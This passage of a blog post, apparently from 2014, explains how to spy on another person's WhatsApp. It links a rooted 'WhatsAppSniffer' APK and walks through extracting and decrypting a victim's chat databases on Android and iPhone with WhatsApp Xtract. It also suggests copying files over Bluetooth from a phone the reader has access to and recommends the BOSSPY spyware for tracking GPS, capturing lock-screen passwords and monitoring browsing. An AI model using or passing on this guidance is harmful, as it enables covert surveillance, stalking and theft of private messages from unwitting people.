&lt;li&gt;&lt;a href=&quot;https://www.dropbox.com/s/007var5gl52apnn/WhatsAppSniffer%20Donate%20%E2%98%85%20root%20v1.03%20%7E%20Go%21%20H4X.apk&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;WhatsAppSniffer Donate ★ root v1.03&lt;/a&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
2. Decrypting Conversations&lt;/h2&gt;
&lt;div&gt;
have your victim locked his whatsapp? or you want all his 
conversation on your PC. Generally for security reasons WhatsApp encrypt
 Conversation while taking backup in SD Card or Phone Memory.But i have 
found a tool on XDA that claims to decrypt all the whatsapp conversation
 down to your PC.&lt;/div&gt;
&lt;div&gt;
If you have some access over his device you can also send files 
from Bluetooth to your device and later read all the conversations.&lt;/div&gt;
&lt;div&gt;
This tool is called&amp;nbsp;&lt;a href=&quot;http://forum.xda-developers.com/showthread.php?t=1583021&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;WhatsApp Xtract&lt;/a&gt;&amp;nbsp;and for this all credits goes to&amp;nbsp;&lt;a href=&quot;http://forum.xda-developers.com/member.php?u=3594618&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;ztedd&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
Some general advice on how to backup Whatsapp and get the database file:&lt;/div&gt;
&lt;h4&gt;
Android&lt;/h4&gt;
&lt;div&gt;
- In Whatsapp go to settings – more – Backup Chats&lt;br /&gt;
- Copy the folder “Whatsapp” on the SD card to your backup location (e.g., PC)&lt;br /&gt;
- (ideally also) use the app Titanium Backup to backup the full whatsapp
 application together with its data, copy the backup from the folder 
“TitaniumBackup” on the SD card to your backup location (e.g., PC)&lt;br /&gt;
- Use this tool Whatsapp Backup Extractor (download in this thread) to 
show the chats in a friendly readable format. The necessary files 
“wa.db” and “msgstore.db” you will find inside the Titanium Backup 
archive “com.whatsapp-[Date]-[some digits].tar.gz”, alternatively 
(without Titanium Backup) you can use the msgstore.db.crypt file from 
the folder Whatsapp/Databases on the SD card.&lt;/div&gt;
&lt;h4&gt;
iPhone&lt;/h4&gt;
&lt;div&gt;
- use Itunes to create an&amp;nbsp;&lt;em&gt;unencrypted&lt;/em&gt;&amp;nbsp;Backup&lt;br /&gt;
- use an Iphone Backup Tool to get the file 
net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite, e.g. I-Twin or 
Iphone Backup Extractor. Make sure to create an unencrypted backup with 
Itunes, as these tools can’t handle encrypted backups. Another 
possibility are forensic tools like UFED Physical Analyzer.)&lt;/div&gt;
&lt;h4&gt;
Blackberry&lt;/h4&gt;
&lt;div&gt;
- sync your blackberry with desktop manager and then copy the messagestore.db file from SD&lt;br /&gt;
- however, it seems that this file is encrypted? Currently we don’t know how to get the unencrypted messagestore.db file&lt;br /&gt;
- Blackberry not supported yet!&lt;/div&gt;
&lt;h4&gt;
Nokia&lt;/h4&gt;
&lt;div&gt;
&amp;nbsp;- not known yet&lt;br /&gt;
- Nokia not supported yet!&lt;/div&gt;
&lt;div&gt;
For Further Detail about this Method you can move to&amp;nbsp;&lt;a href=&quot;http://forum.xda-developers.com/showthread.php?t=1583021&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;this Forum of XDA&lt;/a&gt;.&lt;/div&gt;
&lt;h2&gt;
3. Using Spywares&lt;/h2&gt;
Using 3rd Party Spywares can be very useful for spying not only 
WhatsApp Conversation but also many things like, you can able to Track 
GPS Location, you can capture the lock screen passwords and they can be 
also used for monitoring Websites. there are many spywares in the market
 but i recommend is&amp;nbsp;&lt;a href=&quot;http://www.bosspy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;BOSSPY&lt;/a&gt;. Because it’s free&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/4686174599614814764/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/whatsapp-sniffer-whatsapp-hacking.html#comment-form' title='22 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/4686174599614814764'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/4686174599614814764'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/whatsapp-sniffer-whatsapp-hacking.html' title='WhatsApp Sniffer, WhatsApp Hacking - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>22</thr:total></entry></feed>